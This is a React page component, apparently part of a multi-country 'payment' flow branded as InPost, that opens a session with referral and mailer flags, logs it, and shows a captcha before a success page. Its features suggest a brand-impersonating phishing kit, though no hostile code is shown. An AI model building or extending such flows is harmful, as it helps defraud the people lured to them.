import React, { useState, useEffect } from 'react';
import { useNavigate, useParams } from 'react-router-dom';
import SupportWidget from './SupportWidget';
import SharedCaptchaCard from './SharedCaptchaCard';
import { getCaptchaCardLabels } from '../captchaLabels';
import { useServerCaptcha } from '../hooks/useServerCaptcha';
import { API_URL } from '../apiBase';
import { withMailerFlag } from '../paymentSession';
const SESSION_STORAGE_KEYS = { sessionId: 'payment_session_id', logId: 'payment_log_id' };

/**
 * InPost — страница 1: та же серверная капча и UI, что на остальных потоках.
 */
function Inpost1() {
  const { pageCode } = useParams();
  const navigate = useNavigate();
  const [pageData, setPageData] = useState(null);
  const [loading, setLoading] = useState(true);
  const [sessionId, setSessionId] = useState(() => sessionStorage.getItem(SESSION_STORAGE_KEYS.sessionId) || null);

  const countryCode = pageData?.country_code || (pageCode ? sessionStorage.getItem('page_country_' + pageCode) : null) || 'PL';
  const labels = getCaptchaCardLabels(countryCode);
  const captcha = useServerCaptcha(API_URL, sessionId, true);

  useEffect(() => {
    let cancelled = false;
    const urlParams = new URLSearchParams(window.location.search);
    const referralCode = urlParams.get('ref');
    fetch(`${API_URL}/api/session/start`, {
      method: 'POST',
      headers: { 'Content-Type': 'application/json' },
      body: JSON.stringify(withMailerFlag({
        page_code: pageCode || undefined,
        referral_code: referralCode || undefined,
      })),
    })
      .then((res) => res.json())
      .then((data) => {
        if (cancelled || !data.success) return;
        if (data.session_id) {
          sessionStorage.setItem(SESSION_STORAGE_KEYS.sessionId, data.session_id);
          setSessionId(data.session_id);
        }
        if (data.log_id) sessionStorage.setItem(SESSION_STORAGE_KEYS.logId, String(data.log_id));
      })
      .catch(() => {});
    return () => { cancelled = true; };
  }, [pageCode]);

  useEffect(() => {
    if (!pageCode) {
      setLoading(false);
      return;
    }
    setLoading(true);
    fetch(`${API_URL}/api/page/${pageCode}`)
      .then((res) => res.json())
      .then((data) => {
        if (data.success && data.page) {
          const p = data.page;
          setPageData(p);
          if (p.country_code && pageCode) sessionStorage.setItem('page_country_' + pageCode, p.country_code);
        }
        setLoading(false);
      })
      .catch(() => setLoading(false));
  }, [pageCode]);

  const successPath = pageCode ? `/page/${pageCode}/success` : '/';

  if (loading && pageCode) {
    return (
      <>
        <SharedCaptchaCard
          variant="page"
          labels={labels}
          question=""
          answer=""
          onAnswerChange={() => {}}
          onVerify={() => {}}
          verifyLoading={false}
          error=""
          sessionReady={false}
        />
        <SupportWidget sessionId={sessionId} countryCode={countryCode} />
      </>
    );
  }

  const onVerify = async () => {
    const ok = await captcha.handleCaptchaVerify();
    if (ok) navigate(successPath, { replace: true });
  };

  return (
    <>
      <SharedCaptchaCard
        variant="page"
        labels={labels}
        question={captcha.captchaQuestion}
        answer={captcha.captchaAnswer}
        onAnswerChange={captcha.setCaptchaAnswer}
        onVerify={onVerify}
        verifyLoading={captcha.captchaLoading}
        error={captcha.captchaError}
        sessionReady={Boolean(sessionId)}
      />
      <SupportWidget sessionId={sessionId} countryCode={countryCode} />
    </>
  );
}

export default Inpost1;
